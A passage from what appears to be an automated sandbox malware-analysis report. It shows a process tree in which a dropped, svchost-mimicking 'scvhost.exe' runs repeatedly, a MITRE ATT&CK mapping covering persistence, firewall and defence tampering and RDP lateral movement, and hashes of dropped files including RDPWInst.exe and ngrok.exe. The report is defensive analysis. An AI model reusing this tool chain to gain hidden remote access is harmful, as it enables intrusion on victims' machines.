                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                              1⤵
                                                              • Enumerates system info in registry
                                                              • Modifies Internet Explorer settings
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:648
                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                              1⤵
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:988
                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                              1⤵
                                                              • Enumerates system info in registry
                                                              • Modifies Internet Explorer settings
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2876
                                                            • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                              1⤵
                                                              • Executes dropped EXE
                                                              PID:1644
                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                              1⤵
                                                              • Enumerates system info in registry
                                                              • Modifies Internet Explorer settings
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:1552
                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                              1⤵
                                                              • Enumerates system info in registry
                                                              • Modifies Internet Explorer settings
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2444
                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                              1⤵
                                                              • Checks SCSI registry key(s)
                                                              • Enumerates system info in registry
                                                              • Modifies Internet Explorer settings
                                                              • Modifies registry class
                                                              • Suspicious use of FindShellTrayWindow
                                                              • Suspicious use of SendNotifyMessage
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2356
                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                              1⤵
                                                              • Enumerates system info in registry
                                                              • Modifies Internet Explorer settings
                                                              • Modifies registry class
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:1608
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                              1⤵
                                                                PID:1368
                                                              • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                1⤵
                                                                • Enumerates system info in registry
                                                                • Modifies Internet Explorer settings
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:4552
                                                              • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                                C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                                1⤵
                                                                • Executes dropped EXE
                                                                PID:2828
                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                1⤵
                                                                  PID:2404
                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                  1⤵
                                                                    PID:3552
                                                                  • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                                    C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:4636
                                                                  • C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                                    C:\Users\Admin\AppData\Roaming\scvhost.exe
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    PID:3244
                                                                  • C:\Windows\system32\sihost.exe
                                                                    sihost.exe
                                                                    1⤵
                                                                      PID:2076
                                                                      • C:\Windows\explorer.exe
                                                                        explorer.exe /LOADSAVEDWINDOWS
                                                                        2⤵
                                                                        • Modifies Installed Components in the registry
                                                                        • Drops desktop.ini file(s)
                                                                        • Enumerates connected drives
                                                                        • Checks SCSI registry key(s)
                                                                        • Modifies registry class
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:5056
                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                      1⤵
                                                                      • Enumerates system info in registry
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:5100
                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:5012
                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                      1⤵
                                                                      • Enumerates system info in registry
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:756
                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                      1⤵
                                                                      • Enumerates system info in registry
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4444
                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                      1⤵
                                                                      • Enumerates system info in registry
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:4608
                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                      1⤵
                                                                      • Enumerates system info in registry
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:3604
                                                                    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                      1⤵
                                                                      • Enumerates system info in registry
                                                                      • Modifies Internet Explorer settings
                                                                      • Modifies registry class
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:2936

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Reconnaissance

                                                                    Resource Development

                                                                    Initial Access

                                                                    Execution

                                                                    Scheduled Task/Job

                                                                    1
                                                                    T1053

                                                                    Scripting

                                                                    1
                                                                    T1064

                                                                    Persistence

                                                                    Boot or Logon Autostart Execution

                                                                    4
                                                                    T1547

                                                                    Registry Run Keys / Startup Folder

                                                                    3
                                                                    T1547.001

                                                                    Winlogon Helper DLL

                                                                    1
                                                                    T1547.004

                                                                    Create or Modify System Process

                                                                    2
                                                                    T1543

                                                                    Windows Service

                                                                    2
                                                                    T1543.003

                                                                    Scheduled Task/Job

                                                                    1
                                                                    T1053

                                                                    Privilege Escalation

                                                                    Boot or Logon Autostart Execution

                                                                    4
                                                                    T1547

                                                                    Registry Run Keys / Startup Folder

                                                                    3
                                                                    T1547.001

                                                                    Winlogon Helper DLL

                                                                    1
                                                                    T1547.004

                                                                    Create or Modify System Process

                                                                    2
                                                                    T1543

                                                                    Windows Service

                                                                    2
                                                                    T1543.003

                                                                    Scheduled Task/Job

                                                                    1
                                                                    T1053

                                                                    Defense Evasion

                                                                    Impair Defenses

                                                                    2
                                                                    T1562

                                                                    Disable or Modify System Firewall

                                                                    1
                                                                    T1562.004

                                                                    Disable or Modify Tools

                                                                    1
                                                                    T1562.001

                                                                    Modify Registry

                                                                    7
                                                                    T1112

                                                                    Scripting

                                                                    1
                                                                    T1064

                                                                    Credential Access

                                                                    Discovery

                                                                    Peripheral Device Discovery

                                                                    2
                                                                    T1120

                                                                    Query Registry

                                                                    4
                                                                    T1012

                                                                    System Information Discovery

                                                                    4
                                                                    T1082

                                                                    Lateral Movement

                                                                    Remote Services

                                                                    1
                                                                    T1021

                                                                    Remote Desktop Protocol

                                                                    1
                                                                    T1021.001

                                                                    Collection

                                                                    Command and Control

                                                                    Exfiltration

                                                                    Impact

                                                                    Defacement

                                                                    1
                                                                    T1491

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      627073ee3ca9676911bee35548eff2b8

                                                                      SHA1

                                                                      4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                      SHA256

                                                                      85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                      SHA512

                                                                      3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\scvhost.exe.log
                                                                      Filesize

                                                                      654B

                                                                      MD5

                                                                      2cbbb74b7da1f720b48ed31085cbd5b8

                                                                      SHA1

                                                                      79caa9a3ea8abe1b9c4326c3633da64a5f724964

                                                                      SHA256

                                                                      e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

                                                                      SHA512

                                                                      ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                      Filesize

                                                                      152B

                                                                      MD5

                                                                      7bfba10fa6c480f99af59a64b6074ca5

                                                                      SHA1

                                                                      4c3640f96d8c6748fcd93c318168c0fdd2a9e490

                                                                      SHA256

                                                                      887d03cf55cc9222818b2e91d7486ccac2483ff1808617c3fdbb21f6faaa5f67

                                                                      SHA512

                                                                      b1cbae5e99edf05b1ba3bee9650e00747ef4e40c44fcb9a0c2c241c0130cc7697f8a62482cd231845bc130b94b398a87192915d32fb85afc0bf2a2c4572dd553

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                      Filesize

                                                                      5KB

                                                                      MD5

                                                                      d204e1cd0c2ab21609203f26be24b298

                                                                      SHA1

                                                                      5622f9245d33224638b8c1e3e3a33889b4114bfc

                                                                      SHA256

                                                                      708775709467daeb7c3b4ebf58cfbd57389ed94d09550ae1805ffebf901f0dbf

                                                                      SHA512

                                                                      caeeda79fdf12a13ce3ac7ab79489a73ba7126a08e05da125f1ba34964f2f7ea58edee01de1af7947a68022744126d60ad3a9147556a1c788ecddd6962f4ca5d

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                      Filesize

                                                                      5KB

                                                                      MD5

                                                                      27939ebe665f18096fc72d49c5d81f6e

                                                                      SHA1

                                                                      fbf7a8b3994a5c8b4b258edc33219e4211f04cfe

                                                                      SHA256

                                                                      c3090ed7dc604055cd297364c799b7cea62e95c96b272cc802d79b61635f46ce

                                                                      SHA512

                                                                      556a318d19d67605446082ab4884f185e0e366828bc6c042a74941ef3f380d109b731e72111558f59cc0934dd127b4a5024b75d842f77982f630a22161c6e1f2

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                                                      Filesize

                                                                      25KB

                                                                      MD5

                                                                      6c8c2722fd9b3559b495c03a0bbe794c

                                                                      SHA1

                                                                      3c16a586fc9137ea47431209374a12ed5b90bc92

                                                                      SHA256

                                                                      fcc46c78ef645b5429c3d9b49e156eaf68aebdf3efdc5bacdc926231c99a884e

                                                                      SHA512

                                                                      9542bc5b6b3d1b107b15aeae51494533c1f46c6751c266e4fb2b3c05224865646ee37716983ea0f6512625bbd9e8443befc58a7cf512a1dcde9e339f940e80b1

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                      Filesize

                                                                      16B

                                                                      MD5

                                                                      46295cac801e5d4857d09837238a6394

                                                                      SHA1

                                                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                      SHA256

                                                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                      SHA512

                                                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                                                      Filesize

                                                                      16B

                                                                      MD5

                                                                      206702161f94c5cd39fadd03f4014d98

                                                                      SHA1

                                                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                      SHA256

                                                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                      SHA512

                                                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\fbac4a1b-69ef-445e-9d4a-1cd5209bc28c.tmp
                                                                      Filesize

                                                                      111B

                                                                      MD5

                                                                      285252a2f6327d41eab203dc2f402c67

                                                                      SHA1

                                                                      acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                                                      SHA256

                                                                      5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                                                      SHA512

                                                                      11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                      Filesize

                                                                      10KB

                                                                      MD5

                                                                      14c879b77d7e7921b528bd7651f2cf9b

                                                                      SHA1

                                                                      d1d6b4276363693045a41f95fc831bb49c502396

                                                                      SHA256

                                                                      9440440e247e571761360ced8e5dbf46c32b7f9e699916eed6b3204d498fc7d3

                                                                      SHA512

                                                                      15d354aff26d46cbb565d2573895d1dc84a5a3c178837dadd7a60dcd134443719878f29d6972b3ac61c7babdf5457d69bf86451843d9f806009f03f1b9aa3e2f

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      33b5378db4cfb945e59dcba8d86ca1fa

                                                                      SHA1

                                                                      55d861fced6b039775939284a78cb110bf114888

                                                                      SHA256

                                                                      80024d8b3857dee811579cc54b4cc0457f2a36621ac46f622e88f55beaa27f18

                                                                      SHA512

                                                                      36ed829b43917c3683be9f354b75820820aa58a7469bef74b172359456189ce613778a049d7734388ce96f83e9b5469581612a5d4e5da80d3a9d3a933549a67b

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                      Filesize

                                                                      11KB

                                                                      MD5

                                                                      192c29f26299a2639c0d9a1e9aa1ed72

                                                                      SHA1

                                                                      d260735e1a5ec6e6ae3890bcc368487941d0b36d

                                                                      SHA256

                                                                      87c3722ff7544b3b8eb6a6707cb571f9ad90e6aca7a6b49130d3f58cdafba24c

                                                                      SHA512

                                                                      c8756a812e178fb8e34626d7d7232229ff509edc66d75ac3ceb25527921daff661e94df5af98277d3cd72a0459fbdde88f32ebd6cf394413a1a530fc07f12258

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      050567a067ffea4eb40fe2eefebdc1ee

                                                                      SHA1

                                                                      6e1fb2c7a7976e0724c532449e97722787a00fec

                                                                      SHA256

                                                                      3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

                                                                      SHA512

                                                                      341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      05b3cd21c1ec02f04caba773186ee8d0

                                                                      SHA1

                                                                      39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                                                                      SHA256

                                                                      911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                                                                      SHA512

                                                                      e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      e0b0d108385cd12dd96233c377a7358f

                                                                      SHA1

                                                                      a28aa3f9b75416419fb1b42f08621e6f687b3050

                                                                      SHA256

                                                                      34a588bdb984dcc4995a353bc8abe8c2e3e39d24f9186dd1d2cfea17c816f5c8

                                                                      SHA512

                                                                      76af0bd732b90553a81cd1d6b64d97e1d2c76f6aa2bef727eb134d038c335547b28d12afffb2392e432647fd04632d2c307fa8c37bdad361caf47fcf745ae560

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                      Filesize

                                                                      944B

                                                                      MD5

                                                                      d0c19866ed372c0ad1493bc700a4f665

                                                                      SHA1

                                                                      8deff01b187d761334563e0faaad767bc26b9477

                                                                      SHA256

                                                                      92097d4c09a66ed6c057e968122d723605c4dd9cd39d7ea8c610fa5551c22d79

                                                                      SHA512

                                                                      02e077ff944e9489dc61a3e905546b1b2a66bc1b5a468c0322bcbc9e491d5cf7e9a7ab1729cf3ed0c9f3cb091ecaa63f6e4b35c138eb5110578405060a080548

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Packages\microsoftwindows.client.cbs_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\8SGRGUR0\www.bing[1].xml
                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      5399b36218bb4401382e59aab0f1a074

                                                                      SHA1

                                                                      f5ac59aa3b53c2a27be9d08a151225d3d6797e2b

                                                                      SHA256

                                                                      7cd88ca7f110b9c35d5f0508efe9a733d071558615e47efde7a6ac49332b8e88

                                                                      SHA512

                                                                      cd2f4ddaaa335260b605e72d086234a4801c6d0a16eef3099a7032286f5e0275d5d81bc35a8a8bae940b2b13c4b82ad3b92b35410a3b76f9f93b920da0754d78

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\4f0nku4m\4f0nku4m.cmdline
                                                                      Filesize

                                                                      313B

                                                                      MD5

                                                                      6356c621c30126c75e51b97034b363f1

                                                                      SHA1

                                                                      3dcdfdb7e4e8b56760a89dcac18deed7afe96ba8

                                                                      SHA256

                                                                      ec03a6333fcd5ef9b7f144e24483bd6b4494dff690cb9df86a26056dbe4c752c

                                                                      SHA512

                                                                      8c478c47d43b65046fa8cc203e08c3e581a37cb7ae772e0302ace8c62cf6eb9f84cd295cef3ed45ba1f6c9a2a77dd818da8887645ec0e21c5201528cd3d4c44d

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe
                                                                      Filesize

                                                                      1.4MB

                                                                      MD5

                                                                      3288c284561055044c489567fd630ac2

                                                                      SHA1

                                                                      11ffeabbe42159e1365aa82463d8690c845ce7b7

                                                                      SHA256

                                                                      ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

                                                                      SHA512

                                                                      c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\RES3E6D.tmp
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      628de02b12635e771c0bf6eb5f39f097

                                                                      SHA1

                                                                      ebc3384a06cf528aca64947570ce5cd676568e7f

                                                                      SHA256

                                                                      5fd90a5930c68685a794950e368aee5b483be2c21aeaf6b469fc9144a742a7c2

                                                                      SHA512

                                                                      b0a72f23f2c76b34ac5e2a1cf69f33a28d3a7193a496f026769b5ca24bf2dda1f85cf000afc422354149a6b6eb223b6c0bbc2bd7d25655142544203d3fb7bf9a

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\RES96CE.tmp
                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      df16820b641b2f9b63e46b5c676f2c9d

                                                                      SHA1

                                                                      39612359c378f77b6461002e45bc8ccf288b294f

                                                                      SHA256

                                                                      322c0c7e06d6bb0d36b62ccd6ed5ca60fec0c1ef3cb704487aa86d37b8d8698a

                                                                      SHA512

                                                                      ebf921655db7ea232a6130bead35651ddcc71c32012ecd8b2f2a484f679689232211c5e27982dd8e78332b1d17756f92349b12151e59fcfd924a204b418ac2e8

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\XBackground.bmp
                                                                      Filesize

                                                                      4.7MB

                                                                      MD5

                                                                      1a2e2c33cf5c13ca11f54e540d7db110

                                                                      SHA1

                                                                      95d09a7dae8edb9ced1cd108f758515feecaf895

                                                                      SHA256

                                                                      feca6486248b766bbdc271b6cc40441140ef2d987969f0adb0b5289a54d90e77

                                                                      SHA512

                                                                      0ff5c4a7906f27f31051b26fbf695c52e51e8f0385babaa00551f2d3054f455775a5b3d1e95664820cde85f75927840bfa39b2d0c0536a04f52787fa4aaa8d1a

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zvxyilg.nmy.ps1
                                                                      Filesize

                                                                      60B

                                                                      MD5

                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                      SHA1

                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                      SHA256

                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                      SHA512

                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\dclgksdw\dclgksdw.cmdline
                                                                      Filesize

                                                                      313B

                                                                      MD5

                                                                      9f9d12b12e9d46b67233830768b25b9d

                                                                      SHA1

                                                                      3d2901ef0787e7b457de4d9039d7c2249a6d454b

                                                                      SHA256

                                                                      959685e0305fb518bb6e25eb5f8fc14c8d15069b3ea3a6d16749e8a1ad11860e

                                                                      SHA512

                                                                      f9fc1d99d6e184a8a7940ee70ec4227161f4a752ccb286135603e2a36bc9713dbb763db6911e81600b94ef5eab98da861dce5b6d5d51667a0da80a3c21afaab6

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\h3fjyphv\h3fjyphv.0.vb
                                                                      Filesize

                                                                      386B

                                                                      MD5

                                                                      156a4b3e570d9c7efc0f0094dbceb24e

                                                                      SHA1

                                                                      ccd7e470b9114884d6e958ab4d8b4c451f493c66

                                                                      SHA256

                                                                      7443a1bcd15924a389e5da2a0530b6703a35aed61e63cd1a1d7d0699d49a5a77

                                                                      SHA512

                                                                      90123975819cc2fc3030f94cc8bfce587e8c7efcca8c7ac8a1e99c5f3211c0a50fe16994836fb46fcb3a68b2157259a59f7a5928c19bba2fc3cb4059ecc8efa2

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\h3fjyphv\h3fjyphv.cmdline
                                                                      Filesize

                                                                      313B

                                                                      MD5

                                                                      267bc5bd05c0790cb58332e18302f96b

                                                                      SHA1

                                                                      eb9624134095d5b9351fcc17a51a74a4c5de9902

                                                                      SHA256

                                                                      03ab216b585db531d0aad39e25146711654d15f10fddfeeabebc60491b40833e

                                                                      SHA512

                                                                      033fe565c7676cbceb6f72f91fc66a3b5727e6e4be957d414487ab021ea5a78cac04f6878c706d4794dccc5153c103dce774c309ba4c80ee07e87e70a4ea6068

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\h3fjyphv\h3fjyphv.exe
                                                                      Filesize

                                                                      6KB

                                                                      MD5

                                                                      3a8f293985836059893cb1d82b0441ea

                                                                      SHA1

                                                                      5c97599c16082d4a26475651c1dfbb06eed771d2

                                                                      SHA256

                                                                      05b57d8c765028b54042689ec78aabd0554f5cbb65fdf1bed34f276704a64f1e

                                                                      SHA512

                                                                      f30f1db521afc68956139d15fa0d45faffe18510e8e298dc9bd8ce38251754de3400b18412d2e294f9ce81215009dac46a67d33c6200f98c4d0458d33472528a

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\kh1cm42u\kh1cm42u.0.vb
                                                                      Filesize

                                                                      87B

                                                                      MD5

                                                                      48af133d093f74440abf17964da1dc24

                                                                      SHA1

                                                                      e9f769b8616a27ee3e8b3f4e421ec80325ef6243

                                                                      SHA256

                                                                      9ee51efe9482a52e29c66c6c3333eafb1c8ced17ff245313c7c7531adacb1347

                                                                      SHA512

                                                                      0139ce9dd97cc3baa68338170516b672849342c7c5b7f42d05b721f88d016a5dae305d3163161ccb859365b5f218ee6ae69d5da3949509d5f5220030595cd846

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\kh1cm42u\kh1cm42u.cmdline
                                                                      Filesize

                                                                      313B

                                                                      MD5

                                                                      656456fc5161ebb24b941daa8f524d1e

                                                                      SHA1

                                                                      0f0f5908e4a3fd8c993efc8727f0049a3fd5edda

                                                                      SHA256

                                                                      61e0daa3a24284e5ccfe717cb5fd2acbf88c24abae95037ed5a7a79cddf8ed17

                                                                      SHA512

                                                                      bab5bdb0e0b4f61f2b218be4d74994ee6167440c0aa90d8631ca24fe1a80e382c8eab04c9ee8c060f52e7130c3051e1004b10f531a49af7967b65ab2cdd299d8

                                                                      Download Submit

                                                                    • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
                                                                      Filesize

                                                                      15.2MB

                                                                      MD5

                                                                      46989cdfe662e0a2859f60cb6878342c

                                                                      SHA1

                                                                      b30580051292b0db022d8a1f1d8b2efe158b95b3

                                                                      SHA256

                                                                      33c60e8e432ac593acc0fc24be536372dec17df36e6523fbdd7c4fe5baa000fe

                                                                      SHA512

